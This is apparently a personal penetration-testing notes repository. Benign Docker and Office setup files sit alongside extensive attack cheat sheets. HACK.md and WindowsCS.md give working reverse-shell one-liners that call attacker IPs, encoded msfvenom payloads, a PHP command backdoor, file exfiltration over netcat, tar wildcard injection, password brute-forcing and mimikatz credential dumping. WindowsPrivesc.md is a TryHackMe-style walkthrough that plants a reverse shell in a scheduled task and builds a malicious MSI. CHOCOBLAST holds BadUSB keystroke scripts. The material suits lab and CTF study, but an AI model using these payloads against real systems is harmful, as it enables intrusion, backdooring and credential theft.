├── .gitignore
├── CHOCOBLAST.md
├── Deploy_Office_for_tests.md
├── Docker compose on Debian 11 ARM.md
├── HACK.md
├── Kali_Live_Tips.md
├── WindowsCS.md
├── WindowsPrivesc.md
├── alpine-mirrors.md
├── dnsmasq.md
├── docker.md
├── images
│   ├── dnsmasq.gif
│   ├── pwncat.gif
│   ├── ssti.png
│   ├── terminator_shortcuts.png
│   └── vpnchoice.gif
├── import_ova_to_pve.md
├── install.md
├── ligolo.md
├── osint.txt
└── pwncat-cs.md

/.gitignore:
--------------------------------------------------------------------------------

*.html
.DS_Store
.vscode

--------------------------------------------------------------------------------
/CHOCOBLAST.md:
--------------------------------------------------------------------------------
# CHOCOBLAST

## MALDUINO (outlook)

```powershell
REM CHOCOBLAST
LOCALE FR
DELAY 1000
GUI r
STRING powershell
DELAY 1000
ENTER
DELAY 2000
STRING $outlook = new-object -comobject outlook.application
ENTER
STRING $email = $outlook.CreateItem(0)
ENTER
STRING $email.To = "MAIL1;MAIL2"
ENTER
STRING $email.Subject = "New email test"
ENTER
STRING $email.Body = "This is a testing email"
ENTER
STRING $email.Send()
ENTER
STRING $outlook.Quit()
ENTER
STRING [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null
ENTER
STRING exit
ENTER
```

## WHID (gmail)

```bash
Print:MAIL1;MAIL2
Press:179
Print:Choco
Press:179
Print:J'apporte les chocos la prochaine fois
Press:179
Press:32
```

--------------------------------------------------------------------------------
/Deploy_Office_for_tests.md:
--------------------------------------------------------------------------------
# Deploy Office for tests

- Download the Office Deployment Tool:

  https://www.microsoft.com/en-us/download/details.aspx?id=49117

- Launch it to extract the files where you want
- Open a cmd where the files are located and launch:

```cmd
setup.exe /configure configuration-Office2021Enterprise.xml
```

--------------------------------------------------------------------------------
/Docker compose on Debian 11 ARM.md:
--------------------------------------------------------------------------------
# Docker compose on Debian 11 ARM

## DOCKER

```bash
sudo apt-get remove docker docker-engine docker.io containerd runc
sudo apt-get update
sudo apt-get install ca-certificates curl gnupg lsb-release
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io
```

## PIP3

```bash
sudo apt update
sudo apt -y upgrade
sudo apt update
sudo apt install python3-venv python3-pip
```

## DOCKER-COMPOSE

```bash
pip3 install docker-compose
```

## WORDPRESS

```bash
mkdir my_wordpress
cd my_wordpress
```

### docker-compose.yml

```yml
version: "3.9"

services:
  db:
    image: mariadb:latest
    volumes:
      - db_data:/var/lib/mysql
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: my_root_password
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: my_wordpress_password

  wordpress:
    depends_on:
      - db
    image: wordpress:latest
    volumes:
      - wordpress_data:/var/www/html
    ports:
      - "8000:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: wordpress
      # Must match MYSQL_PASSWORD and MYSQL_DATABASE of the db service above
      WORDPRESS_DB_PASSWORD: my_wordpress_password
      WORDPRESS_DB_NAME: wordpress

volumes:
  db_data: {}
  wordpress_data: {}
```

## LAUNCH

```bash
docker-compose up -d
```

## DELETE

```bash
docker-compose down --volumes
```

## MYSQL / MARIADB

On ARM, using MySQL in docker-compose.yml (`image: mysql:latest`) results in the following error:
`ERROR: no matching manifest for linux/arm64/v8 in the manifest list entries`
This is because the `mysql` image has no arm64 build.
Instead, use mariadb: `image: mariadb:latest`

--------------------------------------------------------------------------------
/HACK.md:
--------------------------------------------------------------------------------
# HACK NOTES

- [HACK NOTES](#hack-notes)
  - [Scan](#scan)
    - [Port Scanning](#port-scanning)
    - [FTP Port 21](#ftp-port-21)
    - [SNMP Port 161](#snmp-port-161)
    - [Web Port 80, 443](#web-port-80-443)
      - [FeroxBuster](#feroxbuster)
    - [MySQL Port 3306 \& MsSQL Port 1433](#mysql-port-3306--mssql-port-1433)
    - [SMB Port 445,139 \& RPC Port 111,135](#smb-port-445139--rpc-port-111135)
    - [DNS](#dns)
  - [SQL Injection](#sql-injection)
  - [SHELL](#shell)
    - [Stable Shell](#stable-shell)
    - [Reverse shell](#reverse-shell)
    - [Shell from SQL injection](#shell-from-sql-injection)
    - [python Spawn shell](#python-spawn-shell)
  - [Post Exploitation](#post-exploitation)
  - [Words list generator](#words-list-generator)
  - [Hash](#hash)
  - [PrivEsc](#privesc)
    - [GTFOBin](#gtfobin)
    - [sudo -l](#sudo--l)
    - [EUID 0 to UID 0](#euid-0-to-uid-0)
    - [LinPeas](#linpeas)
  - [Enum](#enum)
    - [List SUID files](#list-suid-files)
    - [List capabilities files](#list-capabilities-files)
    - [List writable folders](#list-writable-folders)
    - [List of executable binaries](#list-of-executable-binaries)
    - [Netcat](#netcat)
  - [SSH](#ssh)
  - [Password Hack](#password-hack)
    - [Hydra](#hydra)
    - [JohnTheRipper](#johntheripper)
    - [Hashcat](#hashcat)
  - [Steganography](#steganography)
  - [SQLMAP](#sqlmap)
  - [pwncat](#pwncat)
    - [track modifications](#track-modifications)
  - [Wifite](#wifite)
  - [wpscan](#wpscan)
  - [Meterpreter Windows PrivEsc](#meterpreter-windows-privesc)
    - [GetSystem](#getsystem)
    - [Meterpreter shell](#meterpreter-shell)
    - [Generate tcp reverse shell](#generate-tcp-reverse-shell)
    - [MSFConsol one line listener](#msfconsol-one-line-listener)
    - [Suggester](#suggester)
  - [LFI](#lfi)
    - [Fuzz](#fuzz)
    - [View php code](#view-php-code)
    - [View access.log](#view-accesslog)
    - [Command injection](#command-injection)
  - [SSTI](#ssti)
  - [XML external entity (XXE) injection](#xml-external-entity-xxe-injection)
  - [PING](#ping)
  - [TAR Wildcards](#tar-wildcards)
  - [XAuthority / X11 dump](#xauthority--x11-dump)
  - [CSRF / XSS](#csrf--xss)
  - [Websites](#websites)

## Scan

### Port Scanning

```sh
nmap -sC -sV -oN nmap/initial $IP
nmap -sC -sV -p- -oN nmap/all_ports $IP
nmap -Pn -sT -sU -p $ports --script=*vuln* -vv -oN nmap/vuln $IP
```

### FTP Port 21

```sh
nmap -p 21 --script="+*ftp* and not brute and not dos and not fuzzer" -vv -oN nmap/ftp $IP
hydra -s 21 -C /usr/share/.../passwords -u -f $IP ftp
```

### SNMP Port 161

```sh
snmpwalk -c public -v1 $IP
snmp-check $IP
snmpcheck -t $IP -c public
```

### Web Port 80, 443

```sh
nikto -h http://$IP/
gobuster dir -e -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt
gobuster dir -e -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ext,ext2,ext3
wfuzz --hc 404 -c -w /usr/share/seclists/Discovery/Web-Content/common.txt http://$IP/FUZZ.txt
wfuzz -c --hc 403 -u http://paper -H "Host: FUZZ.paper" -w /usr/share/wfuzz/wordlist/general/common.txt
wfuzz -u http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline -z range,1-1000 --hw 1
ffuf -fc 403 -w /usr/share/wfuzz/wordlist/general/common.txt -u http://paper/ -H "Host: FUZZ.paper"
gobuster vhost -u http://test.com -w dnslist.txt --append-domain
```

#### FeroxBuster

```sh
sudo apt update && sudo apt install -y feroxbuster

feroxbuster -e -d0 --url url
```

### MySQL Port 3306 & MsSQL Port 1433

```sh
nmap -p 3306 --script="+*mysql* and not brute and not dos and not fuzzer" -vv -oN nmap/mysql $IP
```

### SMB Port 445,139 & RPC Port 111,135

```sh
enum4linux -a $IP
nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse
nmap --script "smb-vuln*" -p 445 10.129.227.181
nmap --script rpcinfo.nse $IP -p 111
rpcclient -U "" -N $IP
smbclient -L $IP
smbclient \\\\hack.thm\\websvr
showmount -e $IP
smbmap -H hack.thm -R
smbmap -H $IP -d -u -p
mount -t cifs //$IP/ -o username="guest",password=""
```

### DNS

```sh
dig @10.129.227.180 -x 10.129.227.180
dig @10.129.227.180 trick.htb any
dig @10.129.227.180 trick.htb axfr
```

## SQL Injection

`OR 1=1` can be dangerous if an UPDATE/DELETE is done after the SELECT (the injected condition would then match every row).

Prefer the following (you have to know the username):

- admin'; -- -
- admin' AND '1'='1

That way, the SELECT will return only one row.

https://book.hacktricks.xyz/pentesting-web/sql-injection

## SHELL

### Stable Shell

```sh
python -c 'import pty;pty.spawn("/bin/bash")'
# or
python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm
# press CTRL+Z to background the shell, then:
stty raw -echo; fg
# press ENTER twice
```

```sh
alias ll='ls -lah --color'
```

### Reverse shell

```sh
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.129.247 1234 >/tmp/f
```

```sh
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.129.247/1234 0>&1'
```

```sh
nc -nv 10.11.55.28 1234 -e /bin/bash
```

### Shell from SQL injection

- Windows

```sql
?id=1 union all select 1,2,3,4,"""",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
```

- Linux

```sql
?id=1 union all select 1,2,3,4,"""",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
```

### python Spawn shell

```python
import pty; pty.spawn("/bin/sh")
```

## Post Exploitation

```sh
unshadow passwd.txt shadow.txt > passwords.txt
sudo useradd -ou 0 -g 0 john | sudo passwd John@1234
```

```sh
# Attacker side:
nc -l -p 4444 -q 1 > file < /dev/null

# Victim side (ATTACKER_IP is a placeholder for the listener's address):
nc ATTACKER_IP 4444 < file
```

```sh
python -m http.server
python -m SimpleHTTPServer
```

## Words list generator

```sh
cewl -w wordslist.txt -d 10 http://$IP
```

## Hash

- hash-identifier
- hashid

## PrivEsc

### GTFOBin

### sudo -l

- (ALL, !root) /bin/bash

```sh
sudo -u#-1 /bin/bash
```

### EUID 0 to UID 0

```bash
perl -MEnglish -e '$UID = 0; $ENV{PATH} = "/bin:/usr/bin:/sbin:/usr/sbin"; exec "su - root"'
```

### LinPeas

## Enum

### List SUID files

```sh
find / -perm /4000 2>/dev/null
```

### List capabilities files

```sh
getcap -r / 2>/dev/null
```

### List writable folders

```sh
find / -type d -writable 2> /dev/null
```

### List of executable binaries

```sh
find / -maxdepth 6 -perm -g=s -o -perm -4000 ! -type l -exec ls -ld {} \; 2>/dev/null
```

### Netcat

```sh
netcat -l
```

If a service listens only on 127.0.0.1:6666 on the victim:

- On attacker

```sh
apt-get install chisel
# Copy chisel to victim
chisel server --reverse --port 9002
```

- On victim

```sh
./chisel client 10.9.129.247:9002 R:9001:127.0.0.1:6666
```

- On attacker, go to `localhost:9001`

## SSH

* -L: local port forward
* -D: SOCKS proxy
* -N: do not execute a remote command (forwarding only)

Forward a local port to the victim host:
```bash
ssh -N -L 8080:hack.thm:8080 localhost
```

## Password Hack

### Hydra

```sh
hydra -f -t 4 -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP
```

```sh
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid"
```

### JohnTheRipper

- ssh private key

```sh
/usr/share/john/ssh2john.py [ssh_file] > forjohn
john --wordlist=wordlist.txt forjohn
```

### Hashcat

- MD5 Wordlist

```sh
hashcat -a 0 -m 0 "42f749ade7f9e195bf475f37a44cafcb" /usr/share/wordlists/rockyou.txt
```

- MD5 bruteforce

```sh
hashcat -a 3 -m 0 "48bb6e862e54f2a795ffc4e541caed4d" ?a?a?a?a --show
```

## Steganography

```sh
steghide extract -sf file.jpg
```

```sh
stegcracker file.jpg
```

```sh
binwalk file
binwalk -e file
```

## SQLMAP

```sh
sqlmap.py -u "http://www.truc.com/index.php" --form
sqlmap.py -u "http://www.truc.com/index.php" --data "[post data]"
sqlmap.py -u "http://www.truc.com/index.php" --data "[post data]" --dump
```

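The SQL Injection section above prefers the targeted payloads over `OR 1=1` because an UPDATE or DELETE built from the same input would hit every row. The following Python/sqlite3 script is an added example, not part of these notes: it models that two-statement login flow, reports how many rows each payload touches, and places the parameterized version beside it, which is the fix to apply in the application. The user table is constructed for the example.

```python
import sqlite3

# Constructed sample users (not taken from any real system).
USERS = [("admin", "pw-admin"), ("alice", "pw-alice"), ("bob", "pw-bob")]


def make_db():
    """In-memory users table so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, last_login TEXT)"
    )
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """String concatenation: the input is parsed as SQL.

    Models the pattern the notes warn about: a SELECT to authenticate,
    then an UPDATE built from the very same unescaped username.
    Returns (rows matched by the SELECT, rows changed by the UPDATE).
    """
    select_sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    matched = len(con.execute(select_sql).fetchall())
    update_sql = f"UPDATE users SET last_login = 'now' WHERE username = '{username}'"
    changed = con.execute(update_sql).rowcount
    con.commit()
    return matched, changed


def login_safe(con, username, password):
    """Parameterized queries: the input is only ever data, never SQL."""
    matched = len(con.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall())
    changed = con.execute(
        "UPDATE users SET last_login = 'now' WHERE username = ?", (username,)
    ).rowcount
    con.commit()
    return matched, changed


if __name__ == "__main__":
    db = make_db()
    # Blanket payload: the SELECT matches everyone and the UPDATE rewrites every row.
    print("OR 1=1        ->", login_vulnerable(db, "admin' OR 1=1 -- -", "x"))     # (3, 3)
    # Targeted payloads from the notes: only the known user's row is touched.
    print("admin'; -- -  ->", login_vulnerable(db, "admin'; -- -", "x"))           # (1, 1)
    print("admin' AND .. ->", login_vulnerable(db, "admin' AND '1'='1", "pw-admin"))  # (1, 1)
    # Hardened version: the payload is compared as a literal and matches nothing.
    print("safe          ->", login_safe(db, "admin' OR 1=1 -- -", "x"))           # (0, 0)
    print("safe login    ->", login_safe(db, "admin", "pw-admin"))                  # (1, 1)
```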
```sh
sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --dbs
sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --tables -D dvwa
sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --columns -D dvwa -T users
sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --dump -D dvwa -T users
```

```sh
sqlmap -r req.txt --risk 3 --level 5 --technique=BEU --batch --privileges
sqlmap -r req.txt --risk 3 --level 5 --technique=BEU --batch --privileges --file-read=/etc/passwd
```

```sh
--form
--form --dbs
--form --tables -D [database]
--form --columns -D [database] -T [table]
--form --dump -D [database] -T [table] --fresh-queries
```

## pwncat

```sh
python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
```

```sh
pwncat-cs
listen -m linux 1234
sessions
sessions 0
ctrl+d
```

### track modifications

```sh
tamper
tamper --revert --all

source env/bin/activate
pwncat user@IP
run enumerate.gather
run escalate.auto
run escalate.auto exec
```

## Wifite

```sh
sudo wifite --wpa --dict file.txt --kill
```

## wpscan

```sh
wpscan --url $IP/wordpress -e at
wpscan --url $IP/wordpress -e ap
wpscan --url $IP/wordpress -e u
wpscan --url $IP/wordpress --enumerate
wpscan --url $IP/wordpress -U users.txt -P /usr/share/wordlists/rockyou.txt
```

## Meterpreter Windows PrivEsc

### GetSystem

```sh
use priv
getsystem
getuid
```

### Meterpreter shell

```sh
^Z
search shell_to_meterpreter
use 0
options
set SESSION 1
run
sessions
sessions -i 2
```

### Generate tcp reverse shell

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT="1234" -f exe -o rev.exe
```

### MSFConsol one line listener

```bash
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT '1234'; exploit"
```

### Suggester

post/multi/recon/local_exploit_suggester

## LFI

### Fuzz

```sh
wfuzz --hw 0 -c -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt http://$IP/page=../../../../../../../../..FUZZ
```

### View php code

```sh
=php://filter/convert.base64-encode/resource=page.php
```

### View access.log

```sh
=/var/www/html/development_testing/../../../../var/log/apache2/access.log
```

### Command injection

- Capture the request in BurpSuite and then send it to the Repeater tab
- Reload the page with the User-Agent replaced with this php code: ``
- Modify the GET request

```sh
GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=whoami HTTP/1.1
```

- Use the following reverse shell in cmd= (Ctrl+U in Burp to URL-encode it)

```sh
php -r '$sock=fsockopen("10.9.129.247",1234);exec("/bin/sh -i <&3 >&3 2>&3");
```

- One-line backdoor

```php
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>
```

## SSTI

Server-Side Template Injection

![SSTI](images/ssti.png)

## XML external entity (XXE) injection

```xml
]>
&xxe;
```

## PING

On Kali
```bash
sudo tcpdump -i tun0 icmp
```

On victim
```bash
ping -c 2 kali_ip
```

## TAR Wildcards

In case of a cron job like
`*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*`

Payload generation
```sh
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.10 lport=8888 R
```

```sh
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

## XAuthority / X11 dump

If you have access to another user's .Xauthority file

- Set it for your current user

```bash
XAUTHORITY=/tmp/.Xauthority
export XAUTHORITY
xauth list
```

- Check who is connected

```bash
w

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               Fri06   2days  5:38   0.14s /usr/libexec/gnome-session-binary --systemd --session=gnome
```

- Dump their screen

```bash
xwd -root -screen -silent -display :0 -out dump
```

```bash
-display display
    This argument allows you to specify the server to connect to; see x(7).
-out file
    This argument allows the user to explicitly specify the output file on the command line. The default is to output to standard out.
-root
    This option indicates that the root window should be selected for the window dump, without requiring the user to select a window with the pointer.
-screen
    This option indicates that the GetImage request used to obtain the image should be done on the root window, rather than directly on the specified window. In this way, you can obtain pieces of other windows that overlap the specified window, and more importantly, you can capture menus or other popups that are independent windows but appear over the specified window.
-silent
    Operate silently, i.e. don't ring any bells before and after dumping the window.
```

- Open the dump

```bash
xwud -in dump
```

## CSRF / XSS

Example 1

```html
```

Example 2

```html
```

## Websites

--------------------------------------------------------------------------------
/Kali_Live_Tips.md:
--------------------------------------------------------------------------------
# TIPS FOR KALI LIVE

## Reset Windows password

```bash
/Windows/System32/Config
chntpw -l SAM
chntpw -u username SAM
```

--------------------------------------------------------------------------------
/WindowsCS.md:
--------------------------------------------------------------------------------
# Windows Cheat Sheet

- [Windows Cheat Sheet](#windows-cheat-sheet)
  - [Generate a revshell](#generate-a-revshell)
  - [Upload a file](#upload-a-file)
  - [Add color to winPEAS](#add-color-to-winpeas)
  - [MIMIKATZ](#mimikatz)
    - [Commands](#commands)
  - [Unquoted Service Path](#unquoted-service-path)

## Generate a revshell
```bash
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.66.218 LPORT=1234 -f exe -o exp.exe
```

## Upload a file
```bash
certutil.exe -urlcache -split -f http://10.11.66.218:9999/evil.exe C:\\Temp\\evil.exe
```

## Add color to winPEAS
```bash
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```

## MIMIKATZ
Upload `mimikatz`

### Commands
```
privilege::debug
lsadump::sam
```

## Unquoted Service Path
- Scan for vulnerable services
```bash
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
```

- Check permissions
```bash
icacls "C:\Program Files\Development Files"
```

- Create a payload
```bash
msfvenom -p windows/exec CMD="net localgroup administrators sage /add" -f exe-service -o Devservice.exe
```
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.66.218 LPORT=1234 -f exe-service -o Devservice.exe
```

- Get service info
```bash
sc qc "Development Service"
```

--------------------------------------------------------------------------------
/WindowsPrivesc.md:
--------------------------------------------------------------------------------
# Windows Privesc
From Tryhackme Linux Privesc Lab

- [Windows Privesc](#windows-privesc)
- [Harvesting Passwords from Usual Spots](#harvesting-passwords-from-usual-spots)
  - [Unattended Windows Installations](#unattended-windows-installations)
  - [Powershell History](#powershell-history)
  - [Saved Windows Credentials](#saved-windows-credentials)
  - [IIS Configuration](#iis-configuration)
  - [Retrieve Credentials from Software: PuTTY](#retrieve-credentials-from-software-putty)
- [Other Quick Wins](#other-quick-wins)
  - [AlwaysInstallElevated](#alwaysinstallelevated)
- [Abusing Service Misconfigurations](#abusing-service-misconfigurations)
  - [Windows Services](#windows-services)
  - [Insecure Permissions on Service Executable](#insecure-permissions-on-service-executable)
  - [Unquoted Service Paths](#unquoted-service-paths)
  - [Insecure Service Permissions](#insecure-service-permissions)
- [Abusing dangerous privileges](#abusing-dangerous-privileges)
  - [Windows Privileges](#windows-privileges)
  - [SeBackup / SeRestore](#sebackup--serestore)
  - [SeImpersonate / SeAssignPrimaryToken](#seimpersonate--seassignprimarytoken)
- [Abusing vulnerable software](#abusing-vulnerable-software)
  - [Unpatched Software](#unpatched-software)
  - [Case Study: Druva inSync 6.6.3](#case-study-druva-insync-663)
- [Tools of the Trade](#tools-of-the-trade)
  - [WinPEAS](#winpeas)
  - [PrivescCheck](#privesccheck)
  - [WES-NG: Windows Exploit Suggester - Next Generation](#wes-ng-windows-exploit-suggester---next-generation)
  - [Metasploit](#metasploit)

# Harvesting Passwords from Usual Spots
The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files, or stored by software such as browsers or email clients.

## Unattended Windows Installations

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, and its credentials might end up being stored on the machine in the following locations:

- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\Windows\system32\sysprep\sysprep.xml

As part of these files, you might encounter credentials:

```
Administrator
thm.local
MyPassword123
```

## Powershell History

Whenever a user runs a command using Powershell, it gets stored in a file that keeps a history of past commands. This is useful for quickly repeating commands you have used before.
If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a `cmd.exe` prompt:

```
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

Note: The command above will only work from cmd.exe, as Powershell won't recognize `%userprofile%` as an environment variable. To read the file from Powershell, you'd have to replace `%userprofile%` with `$Env:userprofile`.

## Saved Windows Credentials

Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:

```
cmdkey /list
```

While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the `runas` command and the `/savecred` option, as seen below.

```
runas /savecred /user:admin cmd.exe
```

## IIS Configuration

Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called `web.config` and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:

- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings in the file:

```
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
```

## Retrieve Credentials from Software: PuTTY

PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.

To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:

```
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```

Note: Simon Tatham is the creator of PuTTY (and his name is part of the path), not the username for which we are retrieving the password. The stored proxy username should also be visible after running the command above.

Just as PuTTY stores credentials, any software that stores passwords, including browsers, email clients, FTP clients, SSH clients, VNC software and others, will have methods to recover any passwords the user has saved.

# Other Quick Wins
Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access and, in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these.

### Scheduled Tasks

Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or is using a binary you can modify.

Scheduled tasks can be listed from the command line using the `schtasks` command without any options.
To retrieve detailed information about any of the services, you can use a command like the following one: 114 | 115 | ``` 116 | C:\> schtasks /query /tn vulntask /fo list /v 117 | Folder:\ 118 | HostName: THM-PC1 119 | TaskName: \vulntask 120 | Task To Run: C:\tasks\schtask.bat 121 | Run As User: taskusr1 122 | ``` 123 | 124 | You will get lots of information about the task, but what matters for us is the "Task to Run" parameter which indicates what gets executed by the scheduled task, and the "Run As User" parameter, which shows the user that will be used to execute the task. 125 | 126 | If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use `icacls`: 127 | 128 | ``` 129 | C:\> icacls c:\tasks\schtask.bat 130 | c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F) 131 | BUILTIN\Administrators:(I)(F) 132 | BUILTIN\Users:(I)(F) 133 | ``` 134 | 135 | As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like. For your convenience, `nc64.exe` can be found on `C:\tools`. Let's change the bat file to spawn a reverse shell: 136 | 137 | ``` 138 | C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat 139 | ``` 140 | 141 | We then start a listener on the attacker machine on the same port we indicated on our reverse shell: 142 | 143 | ``` 144 | nc -lvp 4444 145 | ``` 146 | 147 | The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. While you probably wouldn't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you some time. 
We can run the task with the following command:

```
C:\> schtasks /run /tn vulntask
```

And you will receive the reverse shell with taskusr1 privileges as expected:

Kali Linux

```
user@attackerpc$ nc -lvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.175.90 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\taskusr1
```

Go to taskusr1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task.

## AlwaysInstallElevated

Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts them. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.

Note: The AlwaysInstallElevated method won't work on this room's machine and it's included as information only.

This method requires two registry values to be set. You can query these from the command line using the commands below.

```
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious .msi file using `msfvenom`, as seen below:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
```

As this is a reverse shell, you should also run the Metasploit Handler module configured accordingly.
Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell:

```
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
```

# Abusing Service Misconfigurations

## Windows Services

Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.

Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not every executable can be started as a service successfully. Each service also specifies the user account under which the service will run.

To better understand the structure of a service, let's check the apphostsvc service configuration with the `sc qc` command:

```
C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: apphostsvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k apphost
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Application Host Helper Service
        DEPENDENCIES       :
        SERVICE_START_NAME : localSystem
```

Here we can see that the associated executable is specified through the BINARY_PATH_NAME parameter, and the account used to run the service is shown in the SERVICE_START_NAME parameter.

Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges.
The DACL can be seen from Process Hacker (available on your machine's desktop):

